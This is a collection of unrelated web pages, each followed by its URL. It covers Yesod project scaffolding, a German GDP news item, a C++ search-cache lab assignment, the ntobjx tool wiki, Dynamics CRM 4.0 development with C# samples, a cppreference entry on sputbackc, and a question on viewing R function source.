Meanwhile, the handler functions will almost certainly refer to the route type. Therefore, they must either be in the same file where the route type is defined, or must import that file. If you follow the logic here, your entire application must essentially live in a single file! Clearly this isn't what we want.

So instead of using mkYesod, the scaffolded site uses a decomposed version of the function. Foundation calls mkYesodData, which declares the route type and render function. Since it does not declare the dispatch function, the handler functions need not be in scope. Import.hs imports Foundation.hs, and all the handler modules import Import.hs. In Application.hs, we call mkYesodDispatch, which creates our dispatch function. For this to work, all handler functions must be in scope, so be sure to add an import statement for any new handler modules you create.

Other than that, Application.hs is pretty simple. It provides two functions: withDevelAppPort is used by yesod devel to launch your app, and getApplication is used by the executable to launch.

Foundation.hs is much more exciting. It:

- Declares your foundation datatype
- Declares a number of instances, such as Yesod, YesodAuth, and YesodPersist
- Imports the messages files. If you look for the line starting with mkMessage, you will see that it specifies the folder containing the messages (messages) and the default language (en, for English).

This is the right file for adding extra instances for your foundation, such as YesodAuthEmail or YesodBreadcrumbs. We'll be referring back to this file later, when we discuss some of the special implementations of Yesod typeclass methods.

Import

The Import module was born out of a few commonly recurring patterns:

- I want to define some helper functions (maybe the <> = mappend operator) to be used by all handlers.
- I'm always adding the same five import statements (Data.Text, Control.Applicative, etc.) to every handler module.
- I want to make sure I never use some evil function (head, readFile, ...) from Prelude.

The solution is to turn on the NoImplicitPrelude language extension, re-export the parts of Prelude we want, add in all the other stuff we want, define our own functions as well, and then import this file in all handlers.

Handler modules

Handler modules should go inside the Handler folder. The site template includes one module: Handler/Root.hs. How you split up your handler functions into individual modules is your decision, but a good rule of thumb is:

- Different methods for the same route should go in the same file, e.g., getBlogR and postBlogR.
- Related routes can also usually go in the same file, e.g., getPeopleR and getPersonR.

Of course, it's entirely up to you. When you add a new handler file, make sure you do the following:

- Add it to version control (you are using version control, right?).
- Add it to the cabal file.
- Add it to the Application.hs file.
- Put a module statement at the top, and an import Import line below it.

widgetFile

It's very common to want to include CSS and Javascript specific to a page. You don't want to have to remember to include those Lucius and Julius files manually every time you refer to a Hamlet file. For this, the site template provides the widgetFile function.

If you have a handler function:

    getRootR = defaultLayout $(widgetFile "homepage")

then Yesod will look for the following files:

    templates/homepage.hamlet
    templates/homepage.lucius
    templates/homepage.cassius
    templates/homepage.julius

If any of those files are present, they will be automatically included in the output.

defaultLayout

One of the first things you're going to want to customize is the look of your site. The layout is actually broken up into two files:

- templates/default-layout-wrapper.hamlet contains just the basic shell of a page. This file is interpreted as plain Hamlet, not as a Widget, and therefore cannot refer to other widgets, embed i18n strings, or add extra CSS/JS.
- templates/default-layout.hamlet is where you would put the bulk of your page. You must remember to include the widget value in the page, as that contains the per-page contents. This file is interpreted as a Widget.

Also, since default-layout is included via the widgetFile function, any Lucius, Cassius, or Julius files named default-layout.* will automatically be included as well.

Static files

The scaffolded site automatically includes the static file subsite, optimized for serving files that will not change over the lifetime of the current build. What this means is that:

- When your static file identifiers are generated (e.g., static/mylogo.png becomes mylogo_png), a query-string parameter is added to it with a hash of the contents of the file. All of this happens at compile time.
- When yesod-static serves your static files, it sets expiration headers far in the future, and includes an etag based on a hash of your content.
- Whenever you embed a link to mylogo_png, the rendering includes the query-string parameter. If you change the logo, recompile, and launch your new app, the query string will have changed, causing users to ignore the cached copy and download a new version.

Additionally, you can set a specific static root in your Settings.hs file to serve from a different domain name. This has the advantage of not requiring transmission of cookies for static file requests, and also lets you offload static file hosting to a CDN or a service like Amazon S3. See the comments in the file for more details.

Another optimization is that CSS and Javascript included in your widgets will not be included inside your HTML. Instead, their contents will be written to an external file, and a link given. This file will be named based on a hash of the contents as well, meaning:

- Caching works properly.
- Yesod can avoid an expensive disk write of the CSS/Javascript file contents if a file with the same hash already exists.
Finally, all of your Javascript is automatically minified via hjsmin.

Conclusion

The purpose of this chapter was not to explain every line that exists in the scaffolded site, but instead to give a general overview of how it works. The best way to become more familiar with it is to jump right in and start writing a Yesod site with it.
http://www.yesodweb.com/blog/2011/12/yesod-scaffolded-site
13 August 2010 10:08 [Source: ICIS news]

LONDON (ICIS)--The German economy grew at a record level in the second quarter of this year, federal statistics office Destatis said.

Germany's GDP rose by 2.2% in the second quarter of 2010 from the previous quarter, based on price, seasonal and calendar adjustment, said Destatis.

"Both domestic and foreign demand made a positive contribution to growth. The dynamic trends observed in capital formation and foreign trade contributed most strongly to the positive development," Destatis said.

Household and government final consumption expenditure also contributed to Germany's second-quarter GDP growth, the office added.

Compared with the second quarter of last year, the office said, Germany's GDP increased by a considerable 4.1%.

The economic performance in the second quarter of 2010 was achieved by 40.3m people in employment. That was an increase of 72,000 people, or 0.2%, from a year earlier, said Destatis.
http://www.icis.com/Articles/2010/08/13/9384789/germany-second-quarter-gdp-rises-by-a-record-2.2-destatis.html
A skeleton version of the programs will appear in your cs35/labs/08 directory when you run update35. The program handin35 will only submit files in this directory. I encourage you to work with a partner on this lab and the entire project.

This lab is the third part of a larger project to build a web browser with a search engine for a limited portion of the web. In the first part, you summarized the content of a web page by creating a binary search tree that contained the word frequencies of all words that appeared in the page that were not in a given file of words to ignore. In the second part, you read in a list of URLs and constructed word frequency trees to summarize their content. Next you prompted the user for a query, searched for each query word in the saved word frequency trees, and then used a priority queue to report the most relevant pages for the query.

In the third part of this project, you will make the search for relevant pages more efficient by caching search results in a dictionary. Each time a query is entered, you will first check a dictionary to see if this query has been answered before. If so, you can get the results directly from the dictionary without any further processing. If not, you will create the results as you did in part 2 and add them to the dictionary.

We'd like to be able to use the cache as much as possible to make our web browser fast. To this end we will remove all ignore words from the query, sort the remaining words, and concatenate them together to make a string key for our dictionary. In this way the queries "computer science department" and "department of computer science" will both end up with the same key "computer department science", assuming "of" is one of the ignore words. Using this approach will allow us to find saved results more frequently, and take the most advantage of the cache.
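The key-building step described above can be sketched in a few lines of C++. This is an illustrative helper, not part of the provided lab code: the function name makeQueryKey and the use of std::set for the ignore words are my own choices.

```cpp
#include <algorithm>
#include <set>
#include <sstream>
#include <string>
#include <vector>

// Build a canonical dictionary key from a raw query: drop every word that
// appears in the ignore set, sort what remains, and join with single spaces.
// "department of computer science" and "computer science department" both
// map to "computer department science" when "of" is an ignore word.
std::string makeQueryKey(const std::string& query,
                         const std::set<std::string>& ignoreWords) {
    std::istringstream in(query);
    std::vector<std::string> words;
    std::string w;
    while (in >> w) {
        if (ignoreWords.count(w) == 0) {
            words.push_back(w);
        }
    }
    std::sort(words.begin(), words.end());

    std::string key;
    for (size_t i = 0; i < words.size(); ++i) {
        if (i > 0) {
            key += " ";
        }
        key += words[i];
    }
    return key;
}
```

Because the key is canonical, it can be used directly as the KEY type of the lab's dictionary: look the key up first, and only run the full priority-queue search on a miss.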
As before, your program will take two command-line arguments: the filename of a list of URLs stored in the Computer Science domain and the filename of a list of words to ignore during the analysis. For example:

    % ./part3 urls.txt ignore.txt

This will output:

    Scanning the ignore file...done.
    Summarized 13 urls
    Enter a query or type 'quit' to end

    Search for: analysis of algorithms
    ignoring of
    query key: algorithms analysis
    Relevant pages:
     : 7
     : 6
     : 4
     : 4
     : 4
     : 2
     : 1
     : 1
    Added to cache

    Search for: algorithms analysis
    query key: algorithms analysis
    Found in cache!
    Relevant pages:
     : 7
     : 6
     : 4
     : 4
     : 4
     : 2
     : 1
     : 1

    Search for: computer science department
    query key: computer department science
    Relevant pages:
     : 35
     : 24
     : 20
     : 17
     : 16
     : 5
     : 1
    Added to cache

    Search for: department of computer science
    ignoring of
    query key: computer department science
    Found in cache!
    Relevant pages:
     : 35
     : 24
     : 20
     : 17
     : 16
     : 5
     : 1

    Search for: quit
    Goodbye

A number of classes are provided for you. Classes, programs or files from the previous lab that you need to copy into the current lab directory are underlined below. Classes, programs or files that you have to complete for this lab appear in bold below.

    char line[80];
    string answer;
    answer = "Relevant pages:\n";
    loop until PQ is empty
        removeMin from the PQ of urls
        sprintf(line, "%60s : %d\n", url.c_str(), frequency);
        answer += line;

It uses sprintf, which does formatted printing into a string, to construct the result in the variable answer. If this idea of saving the hit count and URL of all matching web pages as a string seems a bit artificial, look at the optional extensions below for a better alternative.

    char query[100];
    cout << "Search for: ";
    cin.getline(query, 100);
    string q = query; //convert char* buffer to string

Using SavedResult objects as a dictionary value may cause some unexpected errors. Here are some common errors and their solutions.
This error appears in the keyValuePair constructor when the VALUE type (in this case a SavedResult object) does not have a default constructor. The quick fix is to just add a dummy default constructor in the SavedResult class. Add SavedResult(); as a public method in SavedResult.h and add the following implementation in SavedResult.cpp:

    SavedResult::SavedResult() {
        answer = "";
        bestURL = "";
    }

(Note that the constructor assigns to the existing answer and bestURL members; writing string answer = ""; here would declare new local variables that shadow the members and leave them untouched.)

A better fix is to use initialization lists in keyValuePair.inl and change the constructor to

    template <typename KEY, typename VALUE>
    KVPair<KEY, VALUE>::KVPair(KEY k, VALUE v): key(k), value(v) {
    }

but initialization lists are a bit beyond the scope of cs35, and default constructors may come in handy at other times.

This problem results because C++ does not know how to compare two SavedResult objects for equality. This can be fixed using operator overloading and defining == for the SavedResult class. Add

    bool operator==(SavedResult& other);

to SavedResult.h and implement it as follows in SavedResult.cpp:

    bool SavedResult::operator==(SavedResult& other) {
        return (other.getBestURL() == bestURL && other.getAnswer() == answer);
    }

These additional exercises are not required. Only attempt them once you have successfully completed the requirements described above.
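As a closing illustration, here is a self-contained sketch of the answer-string construction described earlier. It uses std::priority_queue of (frequency, URL) pairs as a stand-in for the lab's own priority queue class, so the function name formatResults and the pair layout are my own assumptions, not part of the lab skeleton.

```cpp
#include <cstdio>
#include <queue>
#include <string>
#include <utility>

// Pop (frequency, url) pairs in decreasing order of frequency and append
// one formatted line per page, exactly as the lab's sprintf snippet does.
// std::priority_queue is a max-heap by default, so top() is the most
// relevant page; the lab's own PQ class uses removeMin instead.
std::string formatResults(
        std::priority_queue<std::pair<int, std::string> > pq) {
    char line[80];
    std::string answer = "Relevant pages:\n";
    while (!pq.empty()) {
        std::pair<int, std::string> hit = pq.top();
        pq.pop();
        // %60s right-aligns the URL in a 60-character field.
        std::snprintf(line, sizeof(line), "%60s : %d\n",
                      hit.second.c_str(), hit.first);
        answer += line;
    }
    return answer;
}
```

The returned string is exactly what a SavedResult would cache, so a cache hit can print it without re-running the search.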
https://web.cs.swarthmore.edu/~adanner/cs35/f10/lab8.php
Wiki: ntobjx / Home

NT Objects

This utility, named NT Objects or short: ntobjx, can be used to explore the Windows object manager namespace. The GUI should be self-explanatory for the most part, especially if you have ever used Windows Explorer. If you have already used WinObj by Microsoft, you will even recognize many of the names.

You can find the latest information about the tool on the overview page, and you can download the respective latest version from the download page.

How to build

Help/documentation

Similar software

- WinObj: the original program from SysInternals (meanwhile a division of Microsoft).
- Object Manager Namespace Viewer: a tool I cowrote with Marcel van Brakel in Delphi some years back in order to showcase the JEDI API header translations for the NT native API.
- ObjectManagerBrowser: I only found out about this by accident in June 2017; referenced here since it has evidently been around since at least 2014.
- WinObjEx64

If you are aware of any other similar software, please open a ticket or drop me an email.
https://bitbucket.org/assarbad/ntobjx/wiki/Home
Application Development in Microsoft Dynamics CRM 4.0

Philip Richardson
Microsoft Corporation
August 2008

Summary

The following topics are covered in this article:

- ASP.NET applications on the Microsoft Dynamics CRM 4.0 server
- ASP.NET applications for Microsoft Dynamics CRM 4.0 for Microsoft Office Outlook with Offline Access
- Plug-ins
- Custom workflow activities
- Scripting
- Setup and deployment
- Application configuration

Applies To

Microsoft Dynamics CRM 4.0
Microsoft Visual Studio 2005

Introduction

- Setup: You may want to create a setup project to deploy your projects to the Microsoft Dynamics CRM server and client computers.

Creating your Development Environment

When you set up your Microsoft Dynamics CRM development environment you have two choices to make: networked or stand-alone. If you use the networked approach, you can set up a Microsoft Dynamics CRM server on your actual network by using physical or virtual computers. The stand-alone option is typically virtual, using a "one-box" deployment.

For the networked approach you should follow the steps in the Microsoft Dynamics CRM 4.0 Implementation Guide. It's highly suggested that you configure the box for both regular Windows and Internet-facing deployment (IFD) authentication modes.

Creating your own virtual one-box deployment might seem a bit difficult at first, but I assure you it is easy and doesn't take very long. This checklist will help you get started. Note that the order of doing this is important. You should read the Implementation Guide before you begin this process.

Creating a one-box deployment

- Hardware: At the moment, I use Windows Vista Enterprise 64-bit on a Lenovo T60P with 4 GB of RAM. Some of my colleagues have also had success using USB sticks for ReadyBoost to increase the RAM. I put the VHD on the laptop's SATA drive. If you do use external drives, make sure that they are faster than the internal drive.
- I use Virtual PC for virtualization.
Virtual Server is also a good option.
- The next step is to build out a Windows Server virtual machine. Try to avoid pre-built VPCs, as they tend to be loaded up with extraneous components.
- Do not join this computer to your domain. For now, keep it connected to a Workgroup.
- Hook your computer up to the Internet and run Windows Update.
- Now configure the VPC to use the Loopback Adapter. You might first have to install the Loopback Adapter on the host operating system (for example, Vista). Here is a screencast on how to do this: Configuring the Loopback Adapter.
- Change the IP address of the server to 192.168.1.1.
- Change the IP address of the host operating system to 192.168.1.2. Use 192.168.1.1 as the DNS server.
- Next, make sure that the server is connected to this private loopback network. Now nothing from the outside except the host operating system can reach the server. This is a safety precaution.
- Install Active Directory on the server. For those who haven't done this in a while: type dcpromo at the command prompt. Make sure to remember the restore password.
- Now install Internet Information Services (IIS).
- Microsoft SQL Server is next. Use Remote Desktop to connect to the server (at 192.168.1.1). You might want to use the IP instead of the server name because you may get NetBIOS conflicts if your host server is also connected to another network. Install SQL Server and make sure that you install SQL Server Reporting Services. For your development computer, I also suggest you use mixed-mode SQL authentication. However, you should always avoid this in a production environment (for the usual reasons).
- Now install Visual Studio on the server. You may want it later for debugging.
- You may want to create a config file to make your server run in IFD mode. For more information, see the Microsoft Dynamics CRM 4.0 Implementation Guide.
    <CRMSetup>
      <Server>
        <ifdsettings enabled="true">
          <internalnetworkaddress>192.168.1.1-255.255.255.255</internalnetworkaddress>
          <rootdomainscheme>http</rootdomainscheme>
          <sdkrootdomain>crm.philiprichardson.org</sdkrootdomain>
          <webapplicationrootdomain>crm.philiprichardson.org</webapplicationrootdomain>
        </ifdsettings>
      </Server>
    </CRMSetup>

- Copy all the Microsoft Dynamics CRM files to the server. The DVD is a good option here, as it contains all the prerequisites (such as Microsoft Visual C++).
- To start the installer, open the command prompt and navigate to the server folder. Assuming that your config file is called ifd.xml, you can type the following:
- Here is a screencast showing the installation experience: Installing CRM.
- Now Microsoft Dynamics CRM is ready to use. Restart the computer and make sure everything is working.
- Create some user accounts in the Active Directory of the server.
- Shut down the VPC and make the VHD file read-only. This is now your "base image."
- Now create a new virtual hard drive with the type set to "Differencing". Parent this to the base image. This might sound a bit confusing at first; try it out and read the VPC help files if you are unsure.
- Note that to access Microsoft Dynamics CRM by using IFD from the host operating system, you also have to add the IFD URL to your hosts file (C:\windows\system32\drivers\…). Map 192.168.1.1 to orgname.crm.philiprichardson.org, substituting the name of your deployment. Also note that you need the orgname in this mapping. Each time you create a new organization you need to add this to the host operating system's hosts file.
- Undo disks are also a good option on the Differencing VPC. Then you can revert changes without creating a new VHD.
- Back up everything. Now you have your environment ready to go and you can easily rebuild it if necessary.
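The hosts-file step in the checklist above amounts to adding a line like the following on the host operating system; orgname is a placeholder for whatever organization name you chose during setup, and one such line is needed per organization.

```
# C:\Windows\System32\drivers\etc\hosts on the host operating system
192.168.1.1    orgname.crm.philiprichardson.org
```

The hosts file uses the standard format of an IP address followed by whitespace and a hostname, with # starting a comment.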
Switching Between IFD and Windows

If you configured your development environment as described previously, you will notice that if you log on to the server using the IP address (192.168.1.1) or the hosts-file-configured URL, you will be prompted for Windows credentials. I use a registry key on the Microsoft Dynamics CRM server to change the internal subnet of the IFD setting. Microsoft Dynamics CRM looks at the IP address of the incoming request and, if this is in the internal range of the registry key, it gives you a "Windows experience." If the IP address is external, it gives you an "IFD experience."

For example, if the client is configured with an IP address of 192.168.1.2 (subnet: 255.255.255.0):

- When the internal range is 192.168.1.1-255.255.255.0, you will get a Windows experience. This is the value that you provided in the config.xml file when you installed Microsoft Dynamics CRM.
- When the internal range is 192.168.1.1-255.255.255.255, you will get an IFD experience. This is because the client on the host operating system has an IP of 192.168.1.2 (subnet: 255.255.255.0), which is outside the internal range.

Here are the two registry key modifications. Note that this is supported. For more information, see the Implementation Guide.

IFD Experience:

Windows Experience:

If you have your own network configuration, you will have to determine the network addresses and subnet masks on your own. I strongly suggest you read the Implementation Guide and the IFD setup documentation. If your environment is located on your network, you may want to contact your network administrator to figure out the correct IP ranges.

Applications that Connect to Microsoft Dynamics CRM

Connecting to Microsoft Dynamics CRM 4.0 uses one of two methods: SQL and Web services. Both are valid techniques, but they do not provide the same functionality.

SQL

This approach involves making a regular SQL connection (with a technology like ADO.NET, for example) and executing SQL statements.
Microsoft Dynamics CRM 4.0 has a set of special SQL views that we call the filtered views. Each entity in Microsoft Dynamics CRM has a corresponding filtered view. For example, the Contact entity has a view called FilteredContact. These views join together all the information for an entity, and they also link to the security tables that contain the row-level security information. This means that if a user has access to, for example, only 15432 contacts out of 3 million in the database, when that user does a SELECT * FROM dbo.FilteredContact they will only see 15432 rows.

The filtered views can only be used for retrieving data. You should never change the database data or schema by using SQL with Microsoft Dynamics CRM. The Microsoft Dynamics CRM middle tier must handle all data and schema transactions. Never make changes directly to the database.

Reporting is the main scenario for using filtered views. You can use these views to generate most of your analysis and reporting for Microsoft Dynamics CRM 4.0. You might also use them with ADO.NET (or similar technologies) when you write applications. Please be aware that the views can be locked down by system administrators. My advice: only use the filtered views for analytical applications.

Web Services

Using Web services is the standard way to connect to Microsoft Dynamics CRM and manipulate the data and schema of the system. Many assumptions you might have made with Microsoft Dynamics CRM 3.0, which is single tenant, must be reconsidered. Our Web service is a SOAP service, which we feel is a great fit for a complex business system such as Microsoft Dynamics CRM. There are three Web services that you should consider in your application architecture:

- CrmDiscoveryService: You can use this service to "discover" information about tenants (organizations) on a server (deployment). In some modes it will also issue security tickets.
- CrmService: This is the "main" Web service.
It handles the manipulation of an organization's transactional data.

- MetadataService: This service handles the manipulation of an organization's metadata (schema).

Authentication

Understanding authentication plays a role in how you connect to Microsoft Dynamics CRM. There are four ways to perform authentication, and not all are available to every deployment.

Integrated Authentication

Use integrated authentication within your firewall, where Integrated Windows Authentication works best:

1. Connect to the Discovery Service and get the organization details by using System.Net.CredentialCache.DefaultCredentials.
2. Create a CrmService by using the information from the organization details.
3. Conduct transactions through the CrmService using System.Net.CredentialCache.DefaultCredentials.

Internet-Facing Deployment

Internet-facing deployment (IFD) uses Active Directory at the back end, but the credentials are collected using a Forms Authentication approach. Microsoft Dynamics CRM 4.0 (the on-premise version) uses Active Directory as the identity store; Microsoft Dynamics CRM Online uses Windows Live ID. For Windows Live ID, the flow is:

1. Make an anonymous request to the Discovery Service to obtain the Microsoft Dynamics CRM Online Windows Live ID policy.
2. Connect to Windows Live ID and supply the policy and the Windows Live ID username/password. It will give you back a Windows Live ID ticket.
3. Connect to the Discovery Service and get the organization details by using the Windows Live ID ticket.
4. Create a CRM ticket by using the Discovery Service and the Windows Live ID ticket. A CRM ticket is organization-specific.
5. Create a CrmService by using the CRM ticket and organization details.
6. Conduct transactions by using the CrmService. The CRM ticket will be passed in the SOAP header. It will authenticate you for a period of time (tickets do time out) against a specific organization.

The Microsoft Dynamics CRM SDK contains samples for each authentication pattern.
To create applications that connect to Microsoft Dynamics CRM, you need to understand the following concepts:

- Where do I find the deployment? This really means: what is the URL for the Discovery Service? There is only one Discovery Service URL for Microsoft Dynamics CRM Online.
- What organization do I want to connect to? Some applications always know this. Other applications may want to query the Discovery Service for a list of all organizations that a user has access to, and then have the user select which organization to connect to. You have to create the UI for this.
- What type of authentication is being used? Integrated, Windows, IFD, or Windows Live ID. Maybe your applications will support some of these authentication types. If so, remember that you are responsible for the UI, so help out your users when connecting. Our Microsoft Dynamics CRM for Microsoft Office Outlook application is a good example of one of these kinds of applications. It's worth looking at how we solved these UI problems and seeing what works or doesn't work in your application.

You have a choice of using our compiled type proxy or the Web Services Description Language (WSDL) when connecting to Microsoft Dynamics CRM. Note that there is no type proxy for the Discovery Service. However, the WSDL is the same for Windows, IFD, and Windows Live ID.

ASP.NET Applications on the Microsoft Dynamics CRM Server

In Microsoft Dynamics CRM 3.0, if you wanted to run an ASP.NET application on the same server as Microsoft Dynamics CRM, you needed to use your own application pool. This application would then connect to Microsoft Dynamics CRM like an external application if it needed to read and write data in Microsoft Dynamics CRM. For credentials, these applications would simply use Integrated Windows Authentication, because a majority of customers used this configuration.
With the introduction of Internet-facing deployment (IFD), which uses Forms Authentication for Active Directory credentials, you cannot rely on Integrated Windows Authentication for your application. It's important to recognize that all partner-hosted customers will use IFD, and most on-premise customers will configure their systems to use IFD plus Windows Authentication. Developers should always consider IFD as a primary usage pattern for their applications.

Because IFD uses a Forms Authentication technology to collect Active Directory credentials, your own applications are faced with a problem. You can't use Integrated Windows Authentication because your application might be running outside the firewall, where this authentication type becomes very "fragile," and you don't want to have to prompt the user for credentials. For this situation we have provided a special class in Microsoft.Crm.Sdk.dll called CrmImpersonator. This class enables an application, which runs inside our context, to use the credentials of the logged-on user.

The following ASP.NET code example shows how to create a new lead and display the GUID of the record it created. The .aspx and .aspx.cs files should be placed on the Microsoft Dynamics CRM server in a folder that is named ISV. The Microsoft.Crm.Sdk and Microsoft.Crm.SdkTypeProxy namespaces derive from two DLLs of the same name. These DLLs are always present with Microsoft Dynamics CRM, so you don't have to package them with your solution. However, you may want to reference them in your project. You can find the DLLs in the \Server\GAC folder of your installation files or in the SDK download.
    using System;
    using System.Configuration;
    using System.Data;
    using System.Web;
    using System.Web.Security;
    using System.Web.UI;
    using System.Web.UI.HtmlControls;
    using System.Web.UI.WebControls;
    using System.Web.UI.WebControls.WebParts;
    using System.Net;
    using Microsoft.Crm.Sdk;
    using Microsoft.Crm.SdkTypeProxy;

    public partial class _Default : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            //Retrieve the organization name from the query string.
            string orgname = Request.QueryString["orgname"].ToString();

            //Declare the lead id outside the using block so that it can
            //be displayed after the block ends.
            Guid leadid;

            //Wrap the CRM Web service code in a using block.
            using (new CrmImpersonator())
            {
                //Create a token with the static method ExtractCrmAuthenticationToken.
                //The 'Context' used here is the Page.Context.
                CrmAuthenticationToken token =
                    CrmAuthenticationToken.ExtractCrmAuthenticationToken(Context, orgname);

                CrmService service = new CrmService();
                service.CrmAuthenticationTokenValue = token;
                service.Credentials = CredentialCache.DefaultCredentials;

                //Create the lead object as usual.
                lead lead = new lead();
                lead.subject = "Lorem";
                lead.firstname = "John";
                lead.lastname = "Smith";
                lead.companyname = "Ipsum";

                //Assign the owner as the caller ID from the token.
                //If you don't do this, the owner will be SYSTEM.
                lead.ownerid = new Owner();
                lead.ownerid.type = EntityName.systemuser;
                lead.ownerid.Value = token.CallerId;

                //Create the lead.
                leadid = service.Create(lead);
            }

            //Display the GUID.
            Response.Write(leadid.ToString());
        }
    }

Let's examine the anatomy of this code pattern:

- You need to possess some prerequisites such as the Page.Context, the organization name, and, if you are using the MetadataService, the MetadataService URL.
- The CrmAuthenticationToken was created using the static ExtractCrmAuthenticationToken method of the CrmAuthenticationToken class.
- You do not have to use the Discovery Service. This code can only access the Microsoft Dynamics CRM server that the code is running on.
- You must manually set the owner of new records using the CallerId property of CrmAuthenticationToken. (See the previous code sample.)

ASP.NET Applications on the Microsoft Dynamics CRM Offline Client

Microsoft Dynamics CRM 4.0 enables you to write an ASP.NET application and put it on the offline client's Web server. This application can call the offline Web service platform to perform operations against Microsoft Dynamics CRM. These files are deployed in [Program Files]\Microsoft Dynamics CRM\Client\res\Web\ISV\[Company Name]\[Application Name]. Typically you can use Windows Installer to distribute these files to clients.

When you execute your code offline, there are several things that you need to know:

- The organization name. You get this from the registry.
- The port number used by the local Web server. Typically, this is 2525. However, you should always check the registry in case there is an abnormal installation.
- The service URLs. You can construct these by concatenating the local host address (the offline Web server listens on 127.0.0.1) + the port number + the service path.

You always use Integrated Windows Authentication to access the offline Web services, regardless of the authentication type on the server (including Microsoft Dynamics CRM Online). You also don't have to wrap your code with a CrmImpersonator block; however, if you do so, there is no harm. If you write symmetrical code for online/offline, make sure that you don't create the token using the ExtractCrmAuthenticationToken method, because it is not available offline. You may want to check whether the code is executing offline; one way to do this is to see if Request.Url.Host is 127.0.0.1.

The following sample shows how this can easily be achieved.

using System;
using Microsoft.Crm.Sdk;
using Microsoft.Crm.SdkTypeProxy;
using Microsoft.Win32;
using System.Text;
using System.Net;

public partial class Hello : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        //Retrieve the port and orgname from the registry.
        RegistryKey regkey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\MSCRMClient");
        string orgname = regkey.GetValue("ClientAuthOrganizationName").ToString();
        string portnumber = regkey.GetValue("CassiniPort").ToString();

        //Construct the URLs. The offline Web server listens on the local host.
        StringBuilder urlbuilder = new StringBuilder();
        urlbuilder.Append("http://127.0.0.1");
        urlbuilder.Append(":");
        urlbuilder.Append(portnumber);
        urlbuilder.Append("/mscrmservices/2007/");
        string crmserviceurl = urlbuilder.ToString() + "crmservice.asmx";

        //Create your token as usual.
        //Offline always uses Integrated Windows Authentication,
        //regardless of the authentication type on the server.
        CrmAuthenticationToken token = new CrmAuthenticationToken();
        token.OrganizationName = orgname;
        token.AuthenticationType = 0;

        CrmService service = new CrmService();
        service.CrmAuthenticationTokenValue = token;
        service.Credentials = CredentialCache.DefaultCredentials;
        service.Url = crmserviceurl;

        WhoAmIRequest request = new WhoAmIRequest();
        WhoAmIResponse response = (WhoAmIResponse)service.Execute(request);
        Response.Write(response.UserId.ToString());
    }
}

Additional Information

Download the Microsoft Dynamics CRM 4.0 Software Development Kit (SDK) from the MSDN Developer Center.

Send Us Your Feedback about this Article

We appreciate hearing from you. To send your feedback, click the following link and type your comments in the message body.
http://msdn.microsoft.com/en-us/library/dd393301.aspx
std::basic_streambuf::sputbackc

Puts a character back to the get area.

If a putback position is available in the get area (gptr() > eback()), and the character c is equal to the character one position to the left of gptr() (as determined by Traits::eq(c, gptr()[-1])), then simply decrements the next pointer (gptr()).

Otherwise, calls pbackfail(Traits::to_int_type(c)) to either back up the get area or to modify both the get area and possibly the associated character sequence.

The I/O stream function basic_istream::putback is implemented in terms of this function.

Parameters

c - the character to put back

Return value

The value of the character put back on success, or the value that pbackfail() returns, which is Traits::eof() on failure.

Example

#include <iostream>
#include <sstream>

int main()
{
    std::stringstream s("abcdef"); // gptr() points to 'a' in "abcdef"
    std::cout << "Before putback, string holds " << s.str() << '\n';
    char c1 = s.get(); // c1 = 'a', gptr() now points to 'b' in "abcdef"
    char c2 = s.rdbuf()->sputbackc('z'); // same as s.putback('z')
                                         // gptr() now points to 'z' in "zbcdef"
    std::cout << "After putback, string holds " << s.str() << '\n';
    char c3 = s.get(); // c3 = 'z', gptr() now points to 'b' in "zbcdef"
    char c4 = s.get(); // c4 = 'b', gptr() now points to 'c' in "zbcdef"
    std::cout << c1 << c2 << c3 << c4 << '\n';
    s.rdbuf()->sputbackc('b'); // gptr() now points to 'b' in "zbcdef"
    s.rdbuf()->sputbackc('z'); // gptr() now points to 'z' in "zbcdef"
    // no putback position left (gptr() == eback()), so pbackfail()
    // is called and fails, returning Traits::eof()
    if (s.rdbuf()->sputbackc('x') == EOF)
        std::cout << "No room to putback after 'z'\n";
}

Output:

Before putback, string holds abcdef
After putback, string holds zbcdef
azzb
No room to putback after 'z'
https://en.cppreference.com/w/cpp/io/basic_streambuf/sputbackc
I want to look at the source code for a function to see how it works. I know I can print a function by typing its name at the prompt:

> t
function (x) 
UseMethod("t")
<bytecode: 0x2332948>
<environment: namespace:base>

In this case, what does UseMethod("t") mean? How do I find the source code that's actually being used by, for example, t(1:10)?

Is there a difference in cases like this one?

> ts.union
function (..., dframe = FALSE) 
.cbind.ts(list(...), .makeNamesTs(...), dframe = dframe, union = TRUE)
<bytecode: 0x36fbf88>
<environment: namespace:stats>

> .cbindts
Error: object '.cbindts' not found
> .makeNamesTs
Error: object '.makeNamesTs' not found

How do I find functions like .cbindts and .makeNamesTs?

And in cases like this one:

> matrix
function (data = NA, nrow = 1, ncol = 1, byrow = FALSE, dimnames = NULL) 
{
    if (is.object(data) || !is.atomic(data)) 
        data <- as.vector(data)
    .Internal(matrix(data, nrow, ncol, byrow, dimnames, missing(nrow), 
        missing(ncol)))
}
<bytecode: 0x134bd10>
<environment: namespace:base>

> .Internal
function (call)  .Primitive(".Internal")
> .Primitive
function (name)  .Primitive(".Primitive")

how do I find out about functions like .Primitive, .C, .Call, .Fortran, .External, and .Internal?

UseMethod("t") is telling you that t() is an (S3) generic function that has methods for different object classes. For S3 classes, you can use the methods function to list the methods for a particular generic function or class.

> methods(t)
[1] t.data.frame t.default    t.ts*

   Non-visible functions are asterisked

> methods(class = "ts")
 [1] aggregate.ts     as.data.frame.ts cbind.ts*        cycle.ts*
 [5] diffinv.ts*      diff.ts          kernapply.ts*    lines.ts
 [9] monthplot.ts*    na.omit.ts*      Ops.ts*          plot.ts
[13] print.ts         time.ts*         [<-.ts*          [.ts*
[17] t.ts*            window<-.ts*     window.ts*

   Non-visible functions are asterisked

"Non-visible functions are asterisked" means the function is not exported from its package's namespace. You can still view its source code via the ::: operator (i.e. stats:::t.ts), or by using getAnywhere(). getAnywhere() is useful because you don't have to know which package the function came from.
> getAnywhere(t.ts)
A single object matching ‘t.ts’ was found
It was found in the following places
  registered S3 method for t from namespace stats
  namespace:stats
with value

function (x) 
{
    cl <- oldClass(x)
    other <- !(cl %in% c("ts", "mts"))
    class(x) <- if (any(other)) cl[other]
    attr(x, "tsp") <- NULL
    t(x)
}
<bytecode: 0x294e410>
<environment: namespace:stats>

The S4 system is a newer method dispatch system and is an alternative to the S3 system. Here is an example of an S4 function:

> library(Matrix)
Loading required package: lattice
> chol2inv
standardGeneric for "chol2inv" defined from package "base"

function (x, ...) 
